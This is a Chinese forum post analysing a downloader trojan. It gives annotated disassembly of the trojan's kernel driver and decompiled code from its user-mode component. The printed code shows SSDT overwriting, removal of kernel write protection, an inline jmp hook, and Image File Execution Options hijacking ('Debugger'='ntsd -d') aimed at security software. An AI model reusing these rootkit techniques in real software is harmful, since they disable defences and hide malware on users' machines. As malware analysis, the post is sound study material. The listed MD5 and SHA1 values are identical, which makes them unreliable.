-
-
[原创]一个下载者木马的简单分析
-
发表于: 2012-11-6 15:10 11092
-
手痒痒,练练手,刚刚又分析了驱动部分代码,贴上。
一、 基本信息
报告名称:02306fe3.exe
作者:hostzhen
报告更新日期:2012-11-5
样本发现日期:
样本类型:木马
样本文件大小/被感染文件变化长度:
样本文件MD5 校验值:B3D1699BAC5F4682CDA6CA7676F8D333
样本文件SHA1 校验值:B3D1699BAC5F4682CDA6CA7676F8D333
壳信息:ASPack
可能受到威胁的系统:这是一个下载者木马,通过劫持系统进程,通过网络下载大量病毒
相关漏洞:
已知检测名称:
二、 初步分析
三、 行为分析
开启Filemon.exe、Regmon.exe、procexp.exe等工具,然后运行02306fe3.exe,监控它的行为。
主要释放了两个文件infotmp.txt(02306fe3.exe释放)、733d0624.tmp(02306fe3.exe释放)、6ad44e42.sys(explorer.exe释放)、appmgmts.dll(explorer.exe释放),然后删除文件02306fe3.exe和infotmp.txt,如图1.
从TcpView.exe、Process explorer 和 Filemon.exe监控可知,该文件有联通网络、下载文件的行为,连接网络的行为如图2.
……略
附件中
四、驱动文件分析
入口:
.text:00400B1B ; NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
.text:00400B1B public DriverEntry
.text:00400B1B DriverEntry proc near
.text:00400B1B
.text:00400B1B DestinationString= UNICODE_STRING ptr -0Ch
.text:00400B1B DeviceObject = dword ptr -4
.text:00400B1B DriverObject = dword ptr 8
.text:00400B1B RegistryPath = dword ptr 0Ch
.text:00400B1B
.text:00400B1B push ebp
.text:00400B1C mov ebp, esp
.text:00400B1E sub esp, 0Ch
.text:00400B21 push ebx
.text:00400B22 push esi
.text:00400B23 push edi
.text:00400B24 xor edi, edi
.text:00400B26 push offset VersionInformation ; lpVersionInformation
.text:00400B2B mov [ebp+DeviceObject], edi
.text:00400B2E call ds:RtlGetVersion
.text:00400B34 mov ebx, ds:RtlInitUnicodeString
.text:00400B3A push offset SourceString ; "\\Device\\Guntior"
.text:00400B3F lea eax, [ebp+DestinationString]
.text:00400B42 push eax ; DestinationString
.text:00400B43 call ebx ; RtlInitUnicodeString
.text:00400B45 mov esi, [ebp+DriverObject]
.text:00400B48 lea eax, [ebp+DeviceObject]
.text:00400B4B push eax ; DeviceObject
.text:00400B4C push edi ; Exclusive
.text:00400B4D push edi ; DeviceCharacteristics
.text:00400B4E push 22h ; DeviceType
.text:00400B50 lea eax, [ebp+DestinationString]
.text:00400B53 push eax ; DeviceName驱动名称"\\Device\\Guntior"
.text:00400B54 push edi ; DeviceExtensionSize
.text:00400B55 push esi ; DriverObject
.text:00400B56 call ds:IoCreateDevice ; 生成设备对象
.text:00400B5C cmp eax, edi
.text:00400B5E jnz short loc_400BDE
.text:00400B60 mov eax, [ebp+DeviceObject]
.text:00400B63 or dword ptr [eax+1Ch], 4
.text:00400B67 push offset a??Guntior ; 符号名称\??\Guntior
.text:00400B6C mov edi, offset DestinationString
.text:00400B71 push edi ; DestinationString
.text:00400B72 call ebx ; RtlInitUnicodeString
.text:00400B74 lea eax, [ebp+DestinationString]
.text:00400B77 push eax ; DeviceName
.text:00400B78 push edi ; SymbolicLinkName
.text:00400B79 call ds:IoCreateSymbolicLink ; 生成符号链接
.text:00400B7F mov edi, eax
.text:00400B81 test edi, edi
.text:00400B83 jz short loc_400B92
.text:00400B85 push [ebp+DeviceObject] ; DeviceObject
.text:00400B88 call ds:IoDeleteDevice
.text:00400B8E mov eax, edi
.text:00400B90 jmp short loc_400BDE
.text:00400B92 ; ---------------------------------------------------------------------------
.text:00400B92
.text:00400B92 loc_400B92: ; CODE XREF: DriverEntry+68j
.text:00400B92 push 1Bh
.text:00400B94 pop ecx
.text:00400B95 lea edi, [esi+38h]
.text:00400B98 mov eax, offset sub_400AFD ; 默认的分发函数
.text:00400B9D rep stosd
.text:00400B9F mov eax, [esi+18h]
.text:00400BA2 mov dword ptr [esi+70h], offset myDeviceIoControl ; IRP_MJ_DEVICE_CONTROL
.text:00400BA2 ; DeviceIoControl请求的处理函数
.text:00400BA9 mov dword ptr [esi+34h], offset DriverUnload
.text:00400BB0 push 200h ; size_t
.text:00400BB5 push 0 ; int
.text:00400BB7
.text:00400BB7 loc_400BB7: ; CODE XREF: sub_400BE5+13j
.text:00400BB7 mov esi, offset word_402598
.text:00400BBC push esi ; void *
.text:00400BBD mov dword ptr [eax+4], offset sub_400B16
.text:00400BC4 call memset
.text:00400BC9 mov eax, [ebp+RegistryPath]
.text:00400BCC movzx ecx, word ptr [eax]
.text:00400BCF push ecx ; size_t
.text:00400BD0 push dword ptr [eax+4] ; void *
.text:00400BD3 push esi ; void *
.text:00400BD4 call memcpy
.text:00400BD9 add esp, 18h
.text:00400BDC xor eax, eax
.text:00400BDE
.text:00400BDE loc_400BDE: ; CODE XREF: DriverEntry+43j
.text:00400BDE ; DriverEntry+75j
.text:00400BDE pop edi
.text:00400BDF pop esi
.text:00400BE0 pop ebx
.text:00400BE1 leave
.text:00400BE2
.text:00400BE2 locret_400BE2: ; CODE XREF: .text:00400C31j
.text:00400BE2 retn 8
.text:00400BE2 DriverEntry endp
.text:00400BE2
默认分发函数没错任何处理,这里主要拦截DeviceIoControl请求的处理信息
myDeviceIoControl分析,按功能号贴上
入口:
.text:004005DD ; NTSTATUS __cdecl myDeviceIoControl(PDEVICE_OBJECT DeviceObject, IRP *pIrp)
.text:004005DD myDeviceIoControl proc near ; DATA XREF: DriverEntry+87o
.text:004005DD
.text:004005DD Handle = dword ptr -80h
.text:004005DD var_48 = dword ptr -48h
.text:004005DD var_44 = dword ptr -44h
.text:004005DD DestinationString= LSA_UNICODE_STRING ptr -40h
.text:004005DD var_30 = dword ptr -30h
.text:004005DD SourceString = OBJECT_ATTRIBUTES ptr -28h
.text:004005DD arg_5E = dword ptr 66h
.text:004005DD
.text:004005DD ; FUNCTION CHUNK AT .text:004006EE SIZE 000002F2 BYTES
.text:004005DD ; FUNCTION CHUNK AT .text:00400A53 SIZE 00000059 BYTES
.text:004005DD
.text:004005DD push ebp
.text:004005DE mov ebp, esp
.text:004005E0 and esp, 0FFFFFFF8h
.text:004005E3 sub esp, 4Ch
.text:004005E6 push ebx
.text:004005E7 push esi
.text:004005E8 push edi
.text:004005E9 mov edi, [ebp+0Ch] ; pIrp
.text:004005EC mov esi, [edi+60h] ; pIrpStack = pIrp->Tail.Overlay.CurrentStackLocation
.text:004005EC ; pIrpStack可以得到功能号等信息,在后面经常要使用到这个变量
.text:004005EF mov eax, [esi+0Ch] ; pIrpStack->Parameters.DeviceIoControl.IoControlCode
.text:004005EF ; 得到功能号
.text:004005F2 xor ebx, ebx
.text:004005F4 mov ecx, 222420h
.text:004005F9 mov [esp+58h+var_48], ebx
.text:004005FD cmp eax, ecx
.text:004005FF ja loc_400969
片段1:
.text:0040077C
.text:0040077C loc_40077C: ; CODE XREF: myDeviceIoControl+33j
.text:0040077C push dword ptr [esi+8] ; dwIoControlCode:222407h
.text:0040077C ; //这个块主要进行获取函数地址并把该地址传给某变量保存
.text:0040077C ; 变量的名称以及修正为该函数实际的名称
.text:0040077C ; 获取这些函数地址的作用是处理其它功能号时会使用到
.text:0040077C ; (size_t)
.text:0040077F push dword ptr [esi+10h] ; (void *)pIrpStack->Parameters.QueryInterface.InterfaceSpecificData
.text:00400782 push offset dword_4028C0 ; void *
.text:00400787 call memcpy
.text:0040078C mov ecx, ds:KeServiceDescriptorTable
.text:00400792 mov ecx, [ecx] ; 囧囧ServiceTableBase
.text:00400794 mov eax, [esi+10h]
.text:00400797 mov [eax+6Ch], ecx
.text:0040079A mov ecx, ds:KeServiceDescriptorTable
.text:004007A0 mov ecx, [ecx+8] ; 嘎嘎,NumberOfService
.text:004007A3 mov eax, [esi+10h]
.text:004007A6 mov esi, ds:RtlInitUnicodeString
.text:004007AC mov [eax+70h], ecx
.text:004007AF mov eax, dword_4028C0 ; 取第一个函数MmGetSystemRoutineAddress
.text:004007B4 mov MmGetSystemRoutineAddress, eax
.text:004007B9 add esp, 0Ch
.text:004007BC lea eax, [esp+58h+SourceString]
.text:004007C0 push eax ; SourceString
.text:004007C1 lea eax, [esp+5Ch+DestinationString]
.text:004007C5 push eax ; DestinationString
.text:004007C6 mov [esp+60h+SourceString.Length], 6F0049h
.text:004007CE mov [esp+60h+SourceString.RootDirectory], 720044h
.text:004007D6 mov [esp+60h+SourceString.ObjectName], 760069h
.text:004007DE mov [esp+60h+SourceString.Attributes], 720065h
.text:004007E6 mov [esp+60h+SourceString.SecurityDescriptor], 62004Fh
.text:004007EE mov [esp+60h+SourceString.SecurityQualityOfService], 65006Ah
.text:004007F6 mov dword ptr [esp+50h], 740063h
.text:004007FE mov dword ptr [esp+54h], 790054h
.text:00400806 mov dword ptr [esp+58h], 650070h
.text:0040080E mov [esp+5Ch], ebx ; 0000000
.text:00400812 call esi ; RtlInitUnicodeString ; SourceString = L"IoDriverObjectType"
.text:00400814 lea eax, [esp+58h+DestinationString]
.text:00400818 push eax ; PUNICODE_STRING
.text:00400819 call MmGetSystemRoutineAddress
.text:0040081F push 79h
.text:00400821 mov myIoDriverObjectType, eax
.text:00400826 pop ebx
.text:00400827 lea eax, [esp+58h+SourceString]
.text:0040082B push eax ; SourceString
.text:0040082C lea eax, [esp+5Ch+DestinationString]
.text:00400830 push eax ; DestinationString
.text:00400831 mov [esp+60h+SourceString.Length], 77005Ah
.text:00400839 mov [esp+60h+SourceString.RootDirectory], 720043h
.text:00400841 mov [esp+60h+SourceString.ObjectName], 610065h
.text:00400849 mov [esp+60h+SourceString.Attributes], 650074h
.text:00400851 mov [esp+60h+SourceString.SecurityDescriptor], 65004Bh
.text:00400859 mov [esp+60h+SourceString.SecurityQualityOfService], ebx ; 00000000
.text:0040085D call esi ; RtlInitUnicodeString ; SourceString = L"ZwCreateMailslotFile"
.text:0040085F lea eax, [esp+58h+DestinationString]
.text:00400863 push eax ; PUNICODE_STRING
.text:00400864 call MmGetSystemRoutineAddress
.text:0040086A mov myZwCreateMailslotFile, eax ; ZwCreateMailslotFile
.text:0040086F lea eax, [esp+58h+SourceString]
.text:00400873 push eax ; SourceString
.text:00400874 lea eax, [esp+5Ch+DestinationString]
.text:00400878 push eax ; DestinationString
.text:00400879 mov [esp+60h+SourceString.Length], 77005Ah ; 这里7个mov指令是赋值一个字符串
.text:00400881 mov [esp+60h+SourceString.RootDirectory], 650053h
.text:00400889 mov [esp+60h+SourceString.ObjectName], 560074h
.text:00400891 mov [esp+60h+SourceString.Attributes], 6C0061h
.text:00400899 mov [esp+60h+SourceString.SecurityDescriptor], 650075h
.text:004008A1 mov [esp+60h+SourceString.SecurityQualityOfService], 65004Bh
.text:004008A9 mov [esp+50h], ebx
.text:004008AD call esi ; RtlInitUnicodeString ; SourceString=L"ZwSetVolumeInformationFile"
.text:004008AF lea eax, [esp+58h+DestinationString]
.text:004008B3 push eax ; PUNICODE_STRING
.text:004008B4 call MmGetSystemRoutineAddress
.text:004008BA mov myZwSetVolumeInformationFile, eax ; ZwSetVolumeInformationFile
.text:004008BF push offset aObreferenceobj ; "ObReferenceObjectByName"
.text:004008C4 lea eax, [esp+5Ch+DestinationString]
.text:004008C8 push eax ; DestinationString
.text:004008C9 call esi ; RtlInitUnicodeString
.text:004008CB lea eax, [esp+58h+DestinationString]
.text:004008CF push eax ; PUNICODE_STRING
.text:004008D0 call MmGetSystemRoutineAddress
.text:004008D6 mov myObReferenceObjectByName, eax
.text:004008DB push offset aPslookupproces ; "PsLookupProcessByProcessId"
.text:004008E0 lea eax, [esp+5Ch+DestinationString]
.text:004008E4 push eax ; DestinationString
.text:004008E5 call esi ; RtlInitUnicodeString
.text:004008E7 lea eax, [esp+58h+DestinationString]
.text:004008EB push eax ; PUNICODE_STRING
.text:004008EC call MmGetSystemRoutineAddress
.text:004008F2 mov myPsLookupProcessByProcessId, eax
.text:004008F7 push offset aZwopenkey ; "ZwOpenKey"
.text:004008FC lea eax, [esp+5Ch+DestinationString]
.text:00400900 push eax ; DestinationString
.text:00400901 call esi ; RtlInitUnicodeString
.text:00400903 lea eax, [esp+58h+DestinationString]
.text:00400907 push eax ; PUNICODE_STRING
.text:00400908 call MmGetSystemRoutineAddress
.text:0040090E mov myZwOpenKey, eax
.text:00400913 mov eax, ds:MmIsAddressValid
.text:00400918 mov myMmIsAddressValid, eax
.text:0040091D mov eax, ds:KfLowerIrql
.text:00400922 mov myKfLowerIrql, eax
.text:00400927 mov eax, ds:_wcsnicmp
.text:0040092C mov mywcsnicmp, eax
.text:00400931 mov eax, ds:swprintf
.text:00400936
.text:00400936 loc_400936: ; CODE XREF: myDeviceIoControl+3D4j
.text:00400936 mov mymemcpy, offset memcpy
.text:00400940 mov myRtlInitUnicodeString, esi
.text:00400946 mov myswprintf, eax
.text:0040094B
.text:0040094B loc_40094B: ; CODE XREF: myDeviceIoControl+19Aj
.text:0040094B xor ebx, ebx
.text:0040094D jmp loc_400A8B
片段2:
.text:0040072F loc_40072F: ; CODE XREF: myDeviceIoControl+3Ej
.text:0040072F mov eax, ds:KeServiceDescriptorTable ; dwIoControlCode:22240Bh 恢复SSDT表
.text:00400734 mov ebx, [eax]
.text:00400736 mov eax, [esi+10h] ; 存放着一个SSDT,新的SSDT
.text:00400739 mov [esp+18h], eax ; 存放该起始地址
.text:0040073D mov eax, [edi+3Ch]
.text:00400740 mov esi, [eax] ; 存放函数的个数,当前测试环境下有11c个
.text:00400742 mov cl, 2 ; NewIrql
.text:00400744 call ds:KfRaiseIrql ; 临时提升IRQL
.text:0040074A push 0
.text:0040074C mov cl, al
.text:0040074E call SetMemoryProtect ; 去除内存保护
.text:00400753 test esi, esi
.text:00400755 jbe short loc_40076A
.text:00400757 mov edx, [esp+18h]
.text:0040075B mov eax, ebx ; 原始SSDT
.text:0040075D sub edx, ebx
.text:0040075F
.text:0040075F loc_40075F: ; CODE XREF: myDeviceIoControl+18Bj
.text:0040075F mov ebx, [edx+eax] ; 把新的SSDT表覆盖到KeServiceDescriptorTable
.text:00400762 mov [eax], ebx
.text:00400764 add eax, 4
.text:00400767 dec esi
.text:00400768 jnz short loc_40075F
.text:0040076A
.text:0040076A loc_40076A: ; CODE XREF: myDeviceIoControl+178j
.text:0040076A push 1
.text:0040076C call SetMemoryProtect ; 恢复内存保护
.text:00400771 call ds:KfLowerIrql ; 把硬件中斷級恢復到原來的IRQL值
.text:00400777 jmp loc_40094B
片段3:
.text:00400648 mov esi, [edi+0Ch] ; dwIoControlCode:22241ch 功能:进行映象劫持
.text:00400648 ; 各种安全软件的注册表中映象劫持选项,例如
.text:00400648 ; \ R e g i s t r y \ M a c h i n e \ S O F T W A R E \ M i c r o s o f t
.text:00400648 ; \ W i n d o w s N T \ C u r r e n t V e r s i o n \ I m a g e F i l e E x e c u t i o n O p t i o n s
.text:00400648 ; \ U f S e A g n t . e x e
.text:0040064B push esi ; SourceString
.text:0040064C lea eax, [esp+24h]
.text:00400650 push eax ; DestinationString
.text:00400651 mov [esp+20h], ebx ; 填充0
.text:00400655 mov [esp+1Ch], ebx
.text:00400659 call ds:RtlInitUnicodeString
.text:0040065F lea eax, [esp+58h+DestinationString.Length+8]
.text:00400663 mov [esp+58h+SourceString.ObjectName], eax
.text:00400667 lea eax, [esp+58h+DestinationString]
.text:0040066B push eax ; ULONG
.text:0040066C push ebx ; ULONG 0
.text:0040066D push ebx ; ULONG 0
.text:0040066E push ebx ; PIO_STATUS_BLOCK 0
.text:0040066F lea eax, [esp+68h+SourceString]
.text:00400673 push eax ; ObjectAttributes
.text:00400674 push 0F003Fh ; ACCESS_MASK
.text:00400679 lea eax, [esp+70h+var_44]
.text:0040067D push eax ; PHANDLE
.text:0040067E mov [esp+74h+SourceString.Length], 18h
.text:00400686 mov [esp+74h+SourceString.RootDirectory], ebx
.text:0040068A mov [esp+74h+SourceString.Attributes], 40h
.text:00400692 mov [esp+74h+SourceString.SecurityDescriptor], ebx
.text:00400696 mov [esp+74h+SourceString.SecurityQualityOfService], ebx
.text:0040069A call myZwCreateMailslotFile
.text:004006A0 cmp [esp+14h], ebx
.text:004006A4 jz loc_400A8B
.text:004006AA lea eax, [esi+200h]
.text:004006B0 push eax ; PCWSTR "Debugger"
.text:004006B1 lea eax, [esp+2Ch]
.text:004006B5 push eax ; PUNICODE_STRING
.text:004006B6 call myRtlInitUnicodeString
.text:004006BC push dword ptr [esi+284h] ; _DWORD
.text:004006C2 lea eax, [esi+288h]
.text:004006C8 push eax ; FS_INFORMATION_CLASS
.text:004006C9 push dword ptr [esi+280h] ; ULONG
.text:004006CF lea eax, [esp+34h]
.text:004006D3 push ebx ; PVOID
.text:004006D4 push eax ; PIO_STATUS_BLOCK
.text:004006D5 push dword ptr [esp+28h] ; HANDLE
.text:004006D9 call myZwSetVolumeInformationFile ;
.text:004006D9 ; 写入信息
.text:004006DF push dword ptr [esp+14h] ; Handle
.text:004006E3 call ds:ZwClose ; 关闭句柄
.text:004006E9 jmp loc_400A8B
片段4:
loc_400A76: ; dwIoControlCode:0x222428
call BeforeDriverUnload ; 恢复环境和删除符号symbolic
jmp short loc_400A8B
片段5:
loc_400A7D: ; dwIoControlCode:0x222424
mov eax, [edi+IRP.AssociatedIrp.IrpCount]
mov eax, [eax] ; IrpCount
call SetHook ; hook 这个地址dword_4028C8到sub_401CF4
函数SetHook
SetHook proc near
mov cl, 2 ; NewIrql
;
; 这个函数的功能是hook dword_4028C8的头5个字节跳转到sub_401CF4
mov dword_402A40, eax
call ds:KfRaiseIrql ; 临时提升IRQL
push 0
mov cl, al
call SetMemoryProtect ; 去除内存保护
mov eax, dword_4028C8 ; 一个函数起始地址指针,eg.KeInitializeApc
lea edx, [eax+5] ; 取偏移5个字节后的4个字节内容
mov dword_402A44, edx
mov byte ptr [eax], 0E9h ; jmp
mov edx, dword_4028C8
mov eax, offset sub_401CF4
sub eax, dword_402A44
push 1
mov [edx+1], eax ; jmp sub_401CF4
call SetMemoryProtect ; 恢复内存保护
call ds:KfLowerIrql ; 恢复IRQL
xor eax, eax
retn
SetHook endp
ring3下的病毒文件,与该sys通信控制的函数是
void __stdcall sub_405331(int a1)
{
int v1; // ST1C_4@5
HMODULE v2; // ST14_4@5
HANDLE v3; // eax@5
int v4; // ST20_4@9
int v5; // eax@16
int v6; // eax@19
int v7; // eax@22
signed int j; // [sp+0h] [bp-1E88h]@24
CHAR pszPath; // [sp+8h] [bp-1E80h]@23
HANDLE hObject; // [sp+110h] [bp-1D78h]@1
HANDLE hThread; // [sp+114h] [bp-1D74h]@1
FARPROC v12; // [sp+118h] [bp-1D70h]@1
int OutBuffer; // [sp+11Ch] [bp-1D6Ch]@1
DWORD flNewProtect; // [sp+120h] [bp-1D68h]@1
int v15; // [sp+124h] [bp-1D64h]@1
char v16; // [sp+128h] [bp-1D60h]@19
WCHAR WideCharStr; // [sp+928h] [bp-1560h]@14
char v18; // [sp+B28h] [bp-1360h]@14
int v19; // [sp+BA8h] [bp-12E0h]@14
int v20; // [sp+BACh] [bp-12DCh]@14
int v21; // [sp+BB0h] [bp-12D8h]@14
DWORD pvData; // [sp+DB0h] [bp-10D8h]@1
HMODULE hLibModule; // [sp+DB4h] [bp-10D4h]@1
CHAR MultiByteStr; // [sp+DB8h] [bp-10D0h]@16
char Dst; // [sp+11B8h] [bp-CD0h]@14
DWORD v26; // [sp+15BCh] [bp-8CCh]@1
int (*v27)(LPSTR, LPCSTR, ...); // [sp+15C0h] [bp-8C8h]@1
int i; // [sp+15C4h] [bp-8C4h]@1
char InBuffer; // [sp+15C8h] [bp-8C0h]@12
i = 0;
v15 = 0;
OutBuffer = 0;
pvData = 0;
flNewProtect = 0;
v26 = 0;
hThread = 0;
hLibModule = 0;
v12 = 0;
v27 = wsprintfA;
hEvent = CreateEventA(0, 0, 0, off_412D08);
hObject = OpenEventA(2u, 0, lpName);
if ( hObject )
{
SetEvent(hObject);
CloseHandle(hObject);
}
sub_40247A(0, 4, 1);
if ( dword_414C18 == 1 )
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, 0, 0, 0);
memset(::MultiByteStr, 0, 0x104u);
memset(Str, 0, 0x40u);
memset(byte_414F60, 0, 0x40u);
GetModuleFileNameA(hModule, ::MultiByteStr, 0x104u);
strrchr(::MultiByteStr, 92);
lstrcpy(v1);
*(_DWORD *)strrchr(Str, 46) = 0;
sub_403DFF((int)Str, (int)byte_414F60);
hLibModule = LoadLibraryA("Psapi.dll");
v12 = GetProcAddress(hLibModule, "GetModuleInformation");
memset(&dword_414A64, 0, 0xCu);
v2 = hModule;
v3 = GetCurrentProcess();
((void (__stdcall *)(HANDLE, HMODULE, int *, signed int))v12)(v3, v2, &dword_414A64, 12);
FreeLibrary(hLibModule);
sub_40233B((char *)off_414950 + 24, 7148, *((_DWORD *)off_414950 + 1));
::hObject = CreateFileA("\\\\.\\Guntior", 0xC0000000u, 3u, 0, 3u, 0, 0);
if ( ::hObject != (HANDLE)-1 )
{
if ( dword_414C18 == 2 )
{
DeviceIoControl(::hObject, 0x222428u, 0, 0, 0, 0, &pvData, 0);
CloseHandle(::hObject);
::hObject = (HANDLE)-1;
}
}
if ( ::hObject != (HANDLE)-1 || sub_404600(v4, 0) || sub_40434C() )
{
sub_403F26(&v15, &OutBuffer);
if ( sub_4030B7(v15, &OutBuffer, &InBuffer) == 1 )
DeviceIoControl(::hObject, 0x22240Bu, &InBuffer, 0x8C0u, &OutBuffer, 4u, &pvData, 0);
sub_402AA9((char *)off_414950 + 888, 0, 2);
v26 = GetCurrentProcessId();
DeviceIoControl(::hObject, 0x222424u, &v26, 4u, 0, 0, &pvData, 0);
hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_403AFA, (LPVOID)1, 0, 0);
TerminateThread(hThread, 0xE1F27272u);
memset(&Dst, 0, 0x400u);
v27(&Dst, "%s\\%s", off_412D04[0], "Image File Execution Options");
sub_403435((int)&Dst);
memset(&WideCharStr, 0, 0x488u);
v19 = 1;
v20 = 16;
memcpy(&v18, L"Debugger", 0x10u);
memcpy(&v21, L"ntsd -d", 0xEu);
for ( i = (int)((char *)off_414950 + 888); *(_BYTE *)i; i += v5 + 1 )
{
wsprintfA(&MultiByteStr, "\\%s\\%s\\%s\\%s", "Registry", "Machine", &Dst, i);
MultiByteToWideChar(0, 0, &MultiByteStr, -1, &WideCharStr, 256);
DeviceIoControl(::hObject, 0x22241Cu, &WideCharStr, 0x488u, 0, 0, &pvData, 0);
v5 = lstrlen(i);
}
DeviceIoControl(::hObject, 0x22242Cu, (char *)off_414950 + 24, 0x320u, 0, 0, &pvData, 0);
}
memset(byte_415488, 0, 0x104u);
wsprintfA(byte_415488, "%s\\%s", &unk_414A70, "dmlocalsvc.dll");
sub_402EC7(byte_415488, hModule, 4u);
sub_4010D2(::MultiByteStr, (int)&lpAddress, (int)&nNumberOfBytesToWrite, 1u);
if ( ::hObject == (HANDLE)-1 )
{
pvData = 2;
memset(&MultiByteStr, 0, 0x400u);
v27(&MultiByteStr, "%s\\%s", lpSubKey, byte_414F60);
SHSetValueA(HKEY_LOCAL_MACHINE, &MultiByteStr, "Start", 4u, &pvData, 4u);
}
else
{
VirtualProtect(hModule, 0x400u, 0x40u, &flNewProtect);
v6 = MultiByteToWideChar(0, 0, ::MultiByteStr, -1, (LPWSTR)&v16, 1024);
DeviceIoControl(::hObject, 0x22240Fu, &v16, 2 * v6, &hModule, 4u, &pvData, 0);
VirtualProtect(hModule, 0x400u, flNewProtect, &pvData);
memset(&WideCharStr, 0, 0x488u);
v19 = 4;
v20 = 4;
memcpy(&v18, L"Start", 0xAu);
v21 = 2;
wsprintfA(&MultiByteStr, "\\%s\\%s\\%s\\%s", "Registry", "Machine", lpSubKey, byte_414F60);
MultiByteToWideChar(0, 0, &MultiByteStr, -1, &WideCharStr, 256);
DeviceIoControl(::hObject, 0x22241Cu, &WideCharStr, 0x488u, 0, 0, &pvData, 0);
}
sub_404CD7(byte_414F60);
if ( ::hObject != (HANDLE)-1 )
{
memset(&MultiByteStr, 0, 0x400u);
wsprintfA(&MultiByteStr, "\\%s\\%s\\%s\\%s", "Registry", "Machine", lpSubKey, byte_414F60);
v7 = MultiByteToWideChar(0, 0, &MultiByteStr, -1, (LPWSTR)&v16, 1024);
DeviceIoControl(::hObject, 0x222420u, &v16, 2 * v7, 0, 0, &pvData, 0);
sub_4050B2();
}
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_40372E, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_403AFA, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_40A006, 0, 0, 0);
wsprintfA(&pszPath, "%s\\%s", &unk_414A70, byte_414D20);
if ( PathFileExistsA(&pszPath) == 1 )
{
for ( j = 0; j < 200 && DeleteFileA(&pszPath) != 1; ++j )
Sleep(0x1Eu);
}
while ( 1 )
{
do
sub_40247A(0, 5, 1);
while ( ::hObject == (HANDLE)-1 );
sub_402AA9((char *)off_414950 + 888, 0, 2);
}
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
|
|
|---|---|
|
|
感谢分享思路方法
|
|
|
尝试对这个驱动看看,相信完整分析后会有很多收获。
|
|
|
谢谢pencil,分析,贴上。。。。。
|
|
|
- [分享]反rootkit工具(带源码) 45870
- [分享]从保护模式到段、门 5010
- [原创]DLL注入之远线程方式 21496
- [分享]HOOK 学习与研究 4710
- [原创]ring3下的Inline hook 15305
